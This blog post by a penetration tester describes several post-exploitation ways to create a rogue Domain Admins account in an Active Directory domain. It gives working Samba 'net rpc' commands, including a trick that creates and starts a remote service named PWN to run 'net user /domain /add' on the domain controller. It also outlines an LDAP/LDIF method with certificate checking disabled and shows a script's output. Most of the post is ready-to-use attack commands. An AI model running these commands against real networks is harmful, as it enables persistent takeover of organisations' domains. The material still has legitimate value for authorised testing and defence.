Create Domain Accounts Variously
I find myself creating Active Directory accounts fairly often. But of course I’m never doing it as a genuine domain administrator. That means I might not have MMC available to me – or maybe not even an RDP session! This blog post is about summarizing a few ways I’ve found handy in various situations.
All of these methods assume that I have somehow obtained a domain administrator account, so this isn’t “exploitation” so much as “post exploitation”. In this case, I’m going to be adding an account named eve to the domain EMPIRE via the domain controller palpatine. There are certainly other methods (e.g., WMI, though I’ve never been driven to use it to create a user thus far; or PSEXEC, which I use all the time, but isn’t all that exciting), so this is not exhaustive.
The Samba net Command, Part I
Samba includes a net command that’s very similar to the traditional Microsoft utility of the same name. It’s more powerful in many ways, though. If the domain is configured “normally”, then the net command should work just fine. It goes something like this:
# net -U EMPIRE\\administrator%Password1 -S palpatine rpc user add eve Password1
Added user 'eve'.
# net -U EMPIRE\\administrator%Password1 -S palpatine rpc group addmem "Domain Admins" eve
The Samba net Command, Part II
I’ve had at least one occasion where this did not work. I had compromised a protected network by obtaining a domain admin credential and finding a host that could communicate exclusively with the domain controller on port 445/TCP. While handy, I found that the above commands didn’t work. Later, I found that the administrators had hardened the domain controller in some unusual ways, one of which crippled a number of RPC calls required to accomplish the above. Not to be undone, I found another way using some net functionality that still worked for me:
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service create PWN PWN \
"cmd /c start /b cmd /c net user /domain /add eve Password1"
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service start PWN
Query status request failed. [WERR_SERVICE_REQUEST_TIMEOUT]
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service delete PWN
Successfully deleted Service: PWN
Then add the user to the Domain Admins group:
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service create PWN PWN \
"cmd /c start /b cmd /c net group /domain /add \"Domain Admins\" eve"
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service start PWN
Query status request failed. [WERR_SERVICE_REQUEST_TIMEOUT]
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service delete PWN
Successfully deleted Service: PWN
Manually via LDAP
Occasionally, I will find a scenario where I don’t have access to useful ports like SMB (445/TCP), but I might have access to LDAP. In this case, you can still create a domain admin, but it’s a little tricky. There are some howtos that you can staple together from the Internet to get there, but here’s the quick way:
- Make sure you have
ldap-utilsinstalled - Create a local
ldaprcfile that disables certificate checking - Create an LDIF file that describes the new user:
- First, create the user as a disabled account and no password
- Set the password with a Base64-encoded UNICODE-16 value
- Enable the account
- Add the account to the “Domain Admins” group
- Use
ldapmodify(or one of its friends) to run the LDIF file
I have written a handy script for this, which makes it look something like this:
# ruby ldapcreate.rb palpatine EMPIRE administrator DC=empire,DC=local eve Password1
-=-=-= LDAP Admin Creator =-=-=-
by Josh Stone (yakovdk@gmail.com)
Enter LDAP Password:
adding new entry "CN=eve,CN=Users,DC=empire,DC=local"
modifying entry "CN=eve,CN=Users,DC=empire,DC=local"
modifying entry "CN=eve,CN=Users,DC=empire,DC=local"
modifying entry "CN=Domain Admins,CN=Users,DC=empire,DC=local"